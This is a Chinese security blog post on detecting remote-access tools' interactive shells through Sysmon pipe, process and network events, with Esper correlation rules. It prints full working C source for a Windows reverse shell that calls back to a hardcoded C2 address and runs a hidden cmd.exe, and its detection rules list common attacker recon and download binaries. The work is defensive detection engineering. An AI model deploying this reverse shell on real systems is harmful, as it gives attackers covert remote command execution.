目录
对于大部分远控,包括商业/开源/自研,都提供交互式cmdshell命令执行功能,并且红队在内网拿到驻点的后渗透过程中,也比较热衷于使用这个功能,如果监控这类场景,将极大提升入侵检出率。
一、交互式cmdshell的实现
由于远控中交互式shell原理和反弹shell基本一致,为了简化分析,以下将用反弹shell的实现方式描述,一般过程为:
创建socket —> 建立到C2服务器的连接 —> 创建2个单向匿名管道 —> 创建cmd.exe子进程 —> 分别在基本输入输出流上绑定2个匿名管道 —> 执行cmd.exe子进程 —> 从管道中循环读取和写入
实现的C代码如下:
/*
@Time : 2015-03-19 18:32
@Author : weizinan
@File : main.c
@Version : 1.0
*/
#include <stdio.h>
#include <stdlib.h>
#include <winsock2.h>
#include <windows.h>
#pragma comment(lib,"ws2_32.lib")
#define SOCK_BUFF_SIZE 2048
enum _bind_cmd_ret_
{
BIND_CMD_NORMAL = 0,
BIND_CMD_ERR_CREATE_PIPE,
BIND_CMD_ERR_RECV,
BIND_CMD_ERR_SEND,
BIND_CMD_ERR_WR_PIPE,
BIND_CMD_ERR_RD_PIPE,
};
int bind_cmd_proc(SOCKET soc)
{
HANDLE hReadPipe1, hWritePipe1, hReadPipe2, hWritePipe2; //两个匿名管道
SECURITY_ATTRIBUTES sa;
STARTUPINFO si;
PROCESS_INFORMATION pi;
fd_set rdSet, wrSet;
struct timeval timeoVal;
char sendBuff[SOCK_BUFF_SIZE];
char recvBuff[SOCK_BUFF_SIZE];
int recvLen = 0;
unsigned long lBytesRead = 0;
memset(&si, NULL, sizeof(STARTUPINFO));
memset(&sa, NULL, sizeof(SECURITY_ATTRIBUTES));
memset(&pi, NULL, sizeof(PROCESS_INFORMATION));
//创建两个匿名管道
sa.nLength = sizeof(sa);
sa.lpSecurityDescriptor = 0;
sa.bInheritHandle = TRUE;
if (!CreatePipe(&hReadPipe1, &hWritePipe1, &sa, 0))
return BIND_CMD_ERR_CREATE_PIPE;
if (!CreatePipe(&hReadPipe2, &hWritePipe2, &sa, 0))
return BIND_CMD_ERR_CREATE_PIPE;
//用管道与cmd.exe绑定
GetStartupInfo(&si);
si.cb = sizeof(si);
si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
si.wShowWindow = SW_HIDE;
si.hStdInput = hReadPipe1;
si.hStdOutput = si.hStdError = hWritePipe2;
CreateProcess(NULL, (LPSTR)"cmd.exe", NULL, NULL, 1, NULL, NULL, NULL, &si, &pi);
//roll select
while (1)
{
timeoVal.tv_sec = 0;
timeoVal.tv_usec = 100;
FD_ZERO(&rdSet);
FD_ZERO(&wrSet);
FD_SET(soc, &rdSet);
memset(recvBuff, NULL, sizeof(recvBuff));
memset(sendBuff, NULL, sizeof(sendBuff));
if (select(-1, &rdSet, NULL, NULL, &timeoVal) > 0)
{
//recv from socket
if (FD_ISSET(soc, &rdSet))
{
if ((recvLen = recv(soc, recvBuff, sizeof(recvBuff) - 1, 0)) <= 0)
{
closesocket(soc);
TerminateProcess(pi.hProcess, -1);
CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
CloseHandle(hReadPipe1);
CloseHandle(hWritePipe1);
CloseHandle(hReadPipe2);
CloseHandle(hWritePipe2);
return BIND_CMD_ERR_RECV;
}
//write to pipe
if (!WriteFile(hWritePipe1, recvBuff, strlen(recvBuff), &lBytesRead, 0))
{
closesocket(soc);
TerminateProcess(pi.hProcess, -1);
CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
CloseHandle(hReadPipe1);
CloseHandle(hWritePipe1);
CloseHandle(hReadPipe2);
CloseHandle(hWritePipe2);
return BIND_CMD_ERR_WR_PIPE;
}
}
}
else
{
if (PeekNamedPipe(hReadPipe2, recvBuff, sizeof(recvBuff) - 1, &lBytesRead, 0, 0) && lBytesRead > 0)
{
//read from cmd.exe
if (!ReadFile(hReadPipe2, recvBuff, sizeof(recvBuff) - 1, &lBytesRead, 0))
{
closesocket(soc);
TerminateProcess(pi.hProcess, -1);
CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
CloseHandle(hReadPipe1);
CloseHandle(hWritePipe1);
CloseHandle(hReadPipe2);
CloseHandle(hWritePipe2);
return BIND_CMD_ERR_RD_PIPE;
}
if (send(soc, recvBuff, strlen(recvBuff), 0) <= 0)
{
closesocket(soc);
TerminateProcess(pi.hProcess, -1);
CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
CloseHandle(hReadPipe1);
CloseHandle(hWritePipe1);
CloseHandle(hReadPipe2);
CloseHandle(hWritePipe2);
return BIND_CMD_ERR_SEND;
}
}
}
}
return BIND_CMD_NORMAL;
}
int init_socket()
{
WSADATA wsa;
memset((char *)&wsa, 0x00, sizeof(wsa));
if (WSAStartup(MAKEWORD(2, 2), &wsa) != 0)
return -1;
return 0;
}
enum _conn_back_ret_
{
CONN_BACK_NORMAL = 0,
CONN_BACK_ERR_INIT,
CONN_BACK_ERR_CREATE_SOC,
CONN_BACK_ERR_CONN,
};
int conn_back_to_server(char *servIP, unsigned short servPort)
{
int retVal;
SOCKET soc;
struct sockaddr_in servAddr;
memset((char *)&servAddr, 0x00, sizeof(servAddr));
servAddr.sin_family = AF_INET;
servAddr.sin_addr.s_addr = inet_addr(servIP);
servAddr.sin_port = htons(servPort);
if (init_socket() != 0)
return CONN_BACK_ERR_INIT;
if ((soc = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET)
return CONN_BACK_ERR_CREATE_SOC;
if (connect(soc, (struct sockaddr *)&servAddr, sizeof(servAddr)) != 0)
return CONN_BACK_ERR_CONN;
retVal = bind_cmd_proc(soc);
return retVal;
}
int main()
{
conn_back_to_server("172.18.249.206", 4444);
return 0;
}
交互式的cmdshell被反弹到C2主机上:
二、Sysmon日志分析
启动交互式shell后,受害者主机上产生与此事件相关的Sysmon日志:
关键日志详细:
# 创建匿名管道,event_id:17
"event_data": {
"EventType": "createpipe",
"PipeName": "<anonymous pipe>",
"ProcessId": "10060",
"Image": "c:\\users\\xxx\\desktop\\c_projects\\cmd_shell\\bin\\debug\\cmd_shell.exe",
"ProcessGuid": "{69cf656d-42f8-6123-7122-000000001500}"
}
# 连接匿名管道,event_id:18
"event_data": {
"EventType": "connectpipe",
"PipeName": "<anonymous pipe>",
"ProcessId": "10060",
"Image": "c:\\users\\xxx\\desktop\\c_projects\\cmd_shell\\bin\\debug\\cmd_shell.exe",
"ProcessGuid": "{69cf656d-42f8-6123-7122-000000001500}"
}
# 创建cmd.exe子进程,event_id:1
"event_data": {
"ParentImage": "c:\\users\\xxx\\desktop\\c_projects\\cmd_shell\\bin\\debug\\cmd_shell.exe",
"Company": "microsoft corporation",
"LogonGuid": "{69cf656d-b3e8-6114-c5bf-100000000000}",
"Description": "windows command processor",
"OriginalFileName": "cmd.exe",
"TerminalSessionId": "1",
"IntegrityLevel": "medium",
"ParentProcessId": "10060",
"Product": "microsoft® windows® operating system",
"Image": "c:\\windows\\system32\\cmd.exe",
"ProcessGuid": "{69cf656d-42f8-6123-7222-000000001500}",
"FileVersion": "10.0.19041.746 (winbuild.160101.0800)",
"ParentCommandLine": "c:\\users\\xxx\\desktop\\c_projects\\cmd_shell\\bin\\debug\\cmd_shell.exe ",
"LogonId": "0x10bfc5",
"CommandLine_Raw": "cmd.exe",
"ParentCommandLine_Raw": "C:\\Users\\xxx\\Desktop\\c_projects\\cmd_shell\\bin\\Debug\\cmd_shell.exe ",
"CommandLine": "cmd.exe",
"ProcessId": "10104",
"ParentProcessGuid": "{69cf656d-42f8-6123-7122-000000001500}",
}
# 访问cmd.exe子进程绑定管道,event_id:10
"event_data": {
"GrantedAccess": "0x1fffff",
"SourceImage": "c:\\users\\xxx\\desktop\\c_projects\\cmd_shell\\bin\\debug\\cmd_shell.exe",
"TargetImageDescription": "windows command processor",
"TargetImageOriginalFileName": "cmd.exe",
"SourceProcessId": "10060",
"SourceProcessGUID": "{69cf656d-42f8-6123-7122-000000001500}",
"UtcTime": "2021-08-23 06:40:56.783",
"TargetProcessId": "10104",
"SourceThreadId": "11216",
"TargetImage": "c:\\windows\\system32\\cmd.exe",
"TargetProcessGUID": "{69cf656d-42f8-6123-7222-000000001500}",
}
# 发起对C2地址的网络链接,event_id:3
"event_data": {
"SourcePort": 62093,
"Image": "c:\\users\\xxx\\desktop\\c_projects\\cmd_shell\\bin\\debug\\cmd_shell.exe",
"DestinationPort": 4444,
"ProcessGuid": "{69cf656d-42f8-6123-7122-000000001500}",
"DestinationIp": "172.18.249.206",
"Initiated": "true",
"SourceIp": "192.168.162.225",
"SourceIsIpv6": "false",
"DestinationIsIpv6": "false",
"ProcessId": "10060",
"Protocol": "tcp",
"direction": "outbound",
"md5": "579f8566e1db5a9831b317eb9f4d4555"
}
通过以上日志,可以梳理出更详细的执行过程:
进程在时间序列上依次触发Sysmon日志ID: 3(主动发起对外网络连接)-> 17(创建匿名管道)-> 18(连接输入管道)-> 17(创建匿名管道)-> 18(连接输出管道)-> 1(启动子进程并执行命令)-> 10(打开子进程绑定基本I/O流)
三、策略构建
总结出行为在日志中的表达后,即可尝试编写CEP规则,不同的CEP引擎规则编写方式不同,例如CEP引擎ESPER在入侵检测系统中的实践,对于此事件描述的EPL语句可参考如下。
1、创建时间窗口缓存事件日志
不仅仅监控cmd.exe,同时需要监控powershell.exe,甚至黑客可能绕过终端程序直接和相关命令绑定管道,此外还有python.exe等脚本解释控制台,都应该在考虑范围内:
# 创建绑定匿名管道执行CMD命令的全局窗口
epl: '
@name("创建绑定匿名管道执行CMD命令的全局窗口_Sysmon_创建临时缓存窗口")
@public
create window dc9ska0wsa_win#groupwin(computer_name)#time(10 sec) as
select
*
from SysmonRawLogs;
@name("创建绑定匿名管道执行CMD命令的全局窗口_Sysmon_创建窗口索引")
create index dc9ska0wsa_win_Index
on dc9ska0wsa_win (
computer_name hash,
event_id hash,
event_data_image hash,
event_data_sourceimage hash,
event_data_processguid hash,
event_data_sourceprocessguid hash,
event_data_processid hash,
event_data_sourceprocessid hash,
event_data_parentimage,
event_data_parentprocessguid,
event_data_parentprocessid
);
@name("创建绑定匿名管道执行CMD命令的全局窗口_Sysmon_写入缓存数据")
insert into dc9ska0wsa_win
select
*
from SysmonRawLogs
where
(
event_id in ("17", "18")
and event_data_pipename = "<anonymous pipe>"
and event_data_eventtype in ("createpipe", "connectpipe")
)
or
(
event_id = "1"
and not StringUtils.wildcard_match(event_data_parentcommandline, "*.ps1")
and not StringUtils.wildcard_match(event_data_parentimage, "*\\java.exe")
and not StringUtils.wildcard_match(event_data_parentimage, "*\\xshellcore.exe")
and (
StringUtils.wildcard_match(event_data_image, "*\\cmd.exe")
or StringUtils.wildcard_match(event_data_image, "*\\powershell.exe")
or StringUtils.wildcard_match(event_data_image, "*\\whoami.exe")
or StringUtils.wildcard_match(event_data_image, "*\\hostname.exe")
or StringUtils.wildcard_match(event_data_image, "*\\net.exe")
or StringUtils.wildcard_match(event_data_image, "*\\net1.exe")
or StringUtils.wildcard_match(event_data_image, "*\\systeminfo.exe")
or StringUtils.wildcard_match(event_data_image, "*\\wmic.exe")
or StringUtils.wildcard_match(event_data_image, "*\\regsvr32.exe")
or StringUtils.wildcard_match(event_data_image, "*\\bitsadmin.exe")
or StringUtils.wildcard_match(event_data_image, "*\\cmstp.exe")
or StringUtils.wildcard_match(event_data_image, "*\\mshta.exe")
or StringUtils.wildcard_match(event_data_image, "*\\certutil.exe")
or StringUtils.wildcard_match(event_data_image, "*\\rundll32.exe")
or StringUtils.wildcard_match(event_data_image, "*\\cscript.exe")
or StringUtils.wildcard_match(event_data_image, "*\\msiexec.exe")
or StringUtils.wildcard_match(event_data_image, "*\\sctasks.exe")
or StringUtils.wildcard_match(event_data_image, "*\\wscript.exe")
or StringUtils.wildcard_match(event_data_image, "*\\tasklist.exe")
or StringUtils.wildcard_match(event_data_image, "*\\taskkill.exe")
or StringUtils.wildcard_match(event_data_image, "*\\ping.exe")
or StringUtils.wildcard_match(event_data_image, "*\\nslookup.exe")
or StringUtils.wildcard_match(event_data_image, "*\\tracert.exe")
or StringUtils.wildcard_match(event_data_image, "*\\xcopy.exe")
or StringUtils.wildcard_match(event_data_image, "*\\quser.exe")
or StringUtils.wildcard_match(event_data_image, "*\\netstat.exe")
or StringUtils.wildcard_match(event_data_image, "*\\qprocess.exe")
or StringUtils.wildcard_match(event_data_image, "*\\nltest.exe")
)
)
or
(
event_id = "10"
and (
StringUtils.wildcard_match(event_data_targetimage, "*\\cmd.exe")
or StringUtils.wildcard_match(event_data_targetimage, "*\\powershell.exe")
or StringUtils.wildcard_match(event_data_targetimage, "*\\whoami.exe")
or StringUtils.wildcard_match(event_data_targetimage, "*\\hostname.exe")
or StringUtils.wildcard_match(event_data_targetimage, "*\\net.exe")
or StringUtils.wildcard_match(event_data_targetimage, "*\\net1.exe")
or StringUtils.wildcard_match(event_data_targetimage, "*\\systeminfo.exe")
or StringUtils.wildcard_match(event_data_targetimage, "*\\wmic.exe")
or StringUtils.wildcard_match(event_data_targetimage, "*\\regsvr32.exe")
or StringUtils.wildcard_match(event_data_targetimage, "*\\bitsadmin.exe")
or StringUtils.wildcard_match(event_data_targetimage, "*\\cmstp.exe")
or StringUtils.wildcard_match(event_data_targetimage, "*\\mshta.exe")
or StringUtils.wildcard_match(event_data_targetimage, "*\\certutil.exe")
or StringUtils.wildcard_match(event_data_targetimage, "*\\rundll32.exe")
or StringUtils.wildcard_match(event_data_targetimage, "*\\cscript.exe")
or StringUtils.wildcard_match(event_data_targetimage, "*\\msiexec.exe")
or StringUtils.wildcard_match(event_data_targetimage, "*\\sctasks.exe")
or StringUtils.wildcard_match(event_data_targetimage, "*\\wscript.exe")
or StringUtils.wildcard_match(event_data_targetimage, "*\\tasklist.exe")
or StringUtils.wildcard_match(event_data_targetimage, "*\\taskkill.exe")
or StringUtils.wildcard_match(event_data_targetimage, "*\\ping.exe")
or StringUtils.wildcard_match(event_data_targetimage, "*\\nslookup.exe")
or StringUtils.wildcard_match(event_data_targetimage, "*\\tracert.exe")
or StringUtils.wildcard_match(event_data_targetimage, "*\\xcopy.exe")
or StringUtils.wildcard_match(event_data_targetimage, "*\\quser.exe")
or StringUtils.wildcard_match(event_data_targetimage, "*\\netstat.exe")
or StringUtils.wildcard_match(event_data_targetimage, "*\\qprocess.exe")
or StringUtils.wildcard_match(event_data_targetimage, "*\\nltest.exe")
)
);
'
2、检测通过绑定2个匿名管道执行交互式命令
# 通过绑定2个单向匿名管道执行交互式CMD命令_Sysmon
epl: '
@name("通过绑定2个单向匿名管道执行交互式CMD命令_Sysmon_内联查询")
select * from
dc9ska0wsa_win as a1,
dc9ska0wsa_win as b1,
dc9ska0wsa_win as a2,
dc9ska0wsa_win as b2,
dc9ska0wsa_win as c1,
dc9ska0wsa_win as d
where
a1.event_id = "17"
and a2.event_id = "17"
and b1.event_id = "18"
and b2.event_id = "18"
and c1.event_id = "10"
and d.event_id = "1"
and a1.log_id != a2.log_id
and b1.log_id != b2.log_id
and a1.event_data_eventtype = "createpipe"
and a1.event_data_pipename = "<anonymous pipe>"
and a2.event_data_eventtype = "createpipe"
and a2.event_data_pipename = "<anonymous pipe>"
and b1.event_data_eventtype = "connectpipe"
and b1.event_data_pipename = "<anonymous pipe>"
and b2.event_data_eventtype = "connectpipe"
and b2.event_data_pipename = "<anonymous pipe>"
and a1.computer_name = b1.computer_name
and a1.event_data_image = b1.event_data_image
and a1.event_data_processguid = b1.event_data_processguid
and a1.event_data_processid = b1.event_data_processid
and b1.computer_name = a2.computer_name
and b1.event_data_image = a2.event_data_image
and b1.event_data_processguid = a2.event_data_processguid
and b1.event_data_processid = a2.event_data_processid
and a2.computer_name = b2.computer_name
and a2.event_data_image = b2.event_data_image
and a2.event_data_processguid = b2.event_data_processguid
and a2.event_data_processid = b2.event_data_processid
and b2.computer_name = c1.computer_name
and b2.event_data_image = c1.event_data_sourceimage
and b2.event_data_processguid = c1.event_data_sourceprocessguid
and b2.event_data_processid = c1.event_data_sourceprocessid
and c1.computer_name = d.computer_name
and c1.event_data_sourceimage = d.event_data_parentimage
and c1.event_data_sourceprocessguid = d.event_data_parentprocessguid
and c1.event_data_sourceprocessid = d.event_data_parentprocessid
and c1.event_data_targetimage = d.event_data_image
and c1.event_data_targetprocessguid = d.event_data_processguid
and c1.event_data_targetprocessid = d.event_data_processid
and a1.unix_timestamp <= b1.unix_timestamp
and a2.unix_timestamp <= b2.unix_timestamp
and b1.unix_timestamp <= c1.unix_timestamp
and a1.unix_timestamp <= d.unix_timestamp
and Math.abs(d.unix_timestamp - a1.unix_timestamp) < 3000
and Math.abs(a1.unix_timestamp - b1.unix_timestamp) < 1500
and Math.abs(a2.unix_timestamp - b2.unix_timestamp) < 1500
and Math.abs(c1.unix_timestamp - d.unix_timestamp) < 1500
;
'
3、关联网络事件确定远控进程
如果仅仅单一检测父进程通过绑定匿名管道与子进程创建交互式shell,可能存在大量误报,例如某些IDE的仿真控制台,也会使用这种形式,因此需要结合网络连接信息综合判断,例如主动发起过对公网的TCP连接,那么行为就很可疑:
# 可疑进程通过2个单向匿名管道执行交互式CMD命令
epl: '
@name("可疑进程通过2个单向匿名管道执行交互式CMD命令_Sysmon_DC_查询同时有两个行为的进程_1")
select * from pattern [
every-distinct(
a.computer_name, a.event_data_sourceip, a.event_data_destinationip,
a.event_data_destinationport, a.event_data_image, 3 hour
)
a=SysmonRawLogs(
event_id = "3"
and event_data_initiated = "true"
and IPAddress4Utils.is_valid_ipv4(event_data_sourceip)
and IPAddress4Utils.is_valid_ipv4(event_data_destinationip)
and event_data_sourceip != "127.0.0.1"
and event_data_destinationip != "127.0.0.1"
and not StringUtils.wildcard_match(event_data_image, "*\\google\\*")
and not StringUtils.wildcard_match(event_data_image, "*\\inetsrv\\w3wp.exe")
and not StringUtils.wildcard_match(event_data_image, "*\\system32\\dns.exe")
and not StringUtils.wildcard_match(event_data_image, "*\\system32\\svchost.exe")
) ->
b=ComplexAttackAlerts(
rule_name = "通过绑定2个单向匿名管道执行交互式CMD命令_Sysmon"
and a.computer_name = host_computer_name
and a.event_data_image = host_parent_images
and a.event_data_processguid = host_parent_guid
and a.event_data_processid = host_parent_pid
) where timer:within(6 hour)
];
'
4、误报情况
新规则上线可能存在部分误报,某些正常软件也存在类似的行为,但误报量也很少,添加少量白名单即可收敛掉,最后告警产生的效果:
四、后话
这个模型仅仅适用于回连型远控的交互式shell功能,如果攻击者不使用这个功能,是无法触发告警,目前测试可监控市面上常见的远控,包括商业和自研的远控,看来各家的实现方式基本都是通过绑定2个单向匿名管道。
但也有的不能被监控,例如CobaltStrike,原因是CobaltStrike的shell不是交互式的,而是使用类似于popen()的函数,仅仅通过1个单向匿名管道,将执行的命令结果读取出后返回给C2,但对于popen()这种执行命令方式的监控,只需将这个模型改为『可疑进程通过1个单向匿名管道执行非交互式CMD命令』即可,细节本文不再赘述。
微信扫一扫,打赏作者吧~